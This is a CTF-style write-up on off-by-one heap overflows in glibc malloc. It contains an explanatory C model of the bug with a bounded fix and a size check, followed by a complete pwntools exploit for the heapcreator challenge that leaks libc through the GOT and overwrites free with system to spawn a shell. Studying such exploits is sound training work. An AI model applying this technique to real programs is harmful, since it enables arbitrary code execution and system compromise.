OffByxxx
Off-by-one and off-by-null are both unintended program behaviours: an unintended overflow of exactly one byte, or an unintended overflow of the single byte \x00. Exploiting them relies on the forward and backward consolidation performed by libc malloc.
In essence, both use the one extra overflowed byte to modify a chunk's size field or its prev_inuse bit, so that when the chunk is freed the allocator merges it with its neighbours and overlapping chunks result, yielding memory that the program never intended to be controllable.
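Added example, not code from the page or the challenge: a C model of the one-byte overflow described above, with the bounded edit beside it and the kind of size sanity check a defender expects the allocator to apply before consolidating. It assumes an x86-64 little-endian layout and chunk sizes constructed to match the 0x21 -> 0x71 edit used below.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy model of two adjacent glibc-style chunks in one byte array (added example, not the
 * page's code). Each chunk is 0x20 bytes: 8-byte prev_size, 8-byte size (bit 0 = PREV_INUSE),
 * then 0x18 bytes of user data that end exactly where the next chunk's size field begins. */
#define CHUNK_SZ   0x20
#define USER_SZ    0x18
#define PREV_INUSE 0x1

typedef void (*edit_fn)(unsigned char *user, const unsigned char *src, size_t len);

/* Buggy edit: "<=" copies len + 1 bytes, so with len == USER_SZ the extra byte lands on
 * the low (little-endian) byte of the next chunk's size field: 0x21 becomes 0x71. */
static void edit_off_by_one(unsigned char *user, const unsigned char *src, size_t len) {
    for (size_t i = 0; i <= len; i++)   /* BUG: should be i < len */
        user[i] = src[i];
}

/* Hardened edit: clamps to the bytes that belong to this chunk and copies exactly len. */
static void edit_bounded(unsigned char *user, const unsigned char *src, size_t len) {
    if (len > USER_SZ) len = USER_SZ;
    memcpy(user, src, len);
}

/* The kind of check glibc applies before trusting a size: flag bits stripped, at least one
 * minimal chunk, 16-byte aligned, and not running past the end of the heap. The forged
 * 0x71 stays aligned, so it is the heap-bound check that rejects it here. */
static int size_is_sane(uint64_t size, size_t chunk_off, size_t heap_len) {
    uint64_t sz = size & ~(uint64_t)0x7;
    return sz >= CHUNK_SZ && (sz % 0x10) == 0 && chunk_off + sz <= heap_len;
}

/* Builds two 0x21-sized chunks, edits chunk 0's data with the given routine using a
 * constructed 0x19-byte payload (0x18 filler + 0x71), and returns chunk 1's size field. */
static uint64_t next_size_after_edit(edit_fn edit) {
    unsigned char heap[2 * CHUNK_SZ] = {0};
    uint64_t sz = CHUNK_SZ | PREV_INUSE;            /* 0x21 */
    memcpy(heap + 8, &sz, sizeof sz);               /* chunk 0 size */
    memcpy(heap + CHUNK_SZ + 8, &sz, sizeof sz);    /* chunk 1 size */
    unsigned char payload[USER_SZ + 1];
    memset(payload, 'a', USER_SZ);
    payload[USER_SZ] = 0x71;
    edit(heap + 16, payload, USER_SZ);              /* chunk 0 user data starts at +16 */
    memcpy(&sz, heap + CHUNK_SZ + 8, sizeof sz);
    return sz;
}
```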
Example: BUU-hitcontraining_heapcreator
```python
from pwn import *

file = "./pwn_patched"
host = "127.0.0.1"
port = 1234
is_remote = False

context.log_level = "debug"
context.binary = file

if is_remote:
    p = remote(host, port)
else:
    p = process(file)

elf = ELF(file)
rop = ROP(elf)
libc = ELF("./libc-2.23.so")


def menu(index: int):
    global p
    p.recvuntil(b"Your choice :")
    p.sendline(str(index).encode())


def create(size: int, content: bytes):
    global p
    menu(1)
    p.recvuntil(b"Size of Heap : ")
    p.sendline(str(size).encode())
    p.recvuntil(b"Content of heap:")
    p.send(content)


def show(index: int) -> int:
    # Reads the printed content back as a little-endian 8-byte value (used for the leak)
    global p
    menu(3)
    p.recvuntil(b"Index :")
    p.sendline(str(index).encode())
    p.recvuntil(b"Content : ")
    content = u64(p.recvuntil(b"\n", drop=True).ljust(0x8, b"\x00"))
    return content


def delete(index: int):
    global p
    menu(4)
    p.recvuntil(b"Index :")
    p.sendline(str(index).encode())


def edit(index: int, content: bytes):
    global p
    menu(2)
    p.recvuntil(b"Index :")
    p.sendline(str(index).encode())
    p.recvuntil(b"Content of heap : ")
    p.send(content)


create(0x18, b"aaaa")  # chunk1: 0x20, chunk2: 0x20
create(0x20, b"aaaa")  # chunk3: 0x20, chunk4: 0x30
create(0x20, b"aaaa")  # chunk5: 0x20, chunk6: 0x30
input(f"allocations done, attach with pwndbg -p {p.pid}")

# off-by-one: the 0x19th byte overwrites the low byte of the next chunk's size field
payload = cyclic(0x18) + p8(0x71)
edit(0, payload)
input("off by one")

delete(1)
payload = flat({0x50: [p64(0x20), p64(elf.got["puts"])]}, filler=b"\x00")
create(0x60, payload)
puts_addr = show(2)
log.info(f"puts_addr --> {hex(puts_addr)}")

libc.address = puts_addr - libc.symbols["puts"]
system_addr = libc.symbols["system"]

payload = flat({0x50: [p64(0x20), p64(elf.got["free"])]}, filler=b"\x00")
edit(1, payload)
edit(2, p64(system_addr))
edit(0, b"/bin/sh\x00")
delete(0)
p.interactive()
```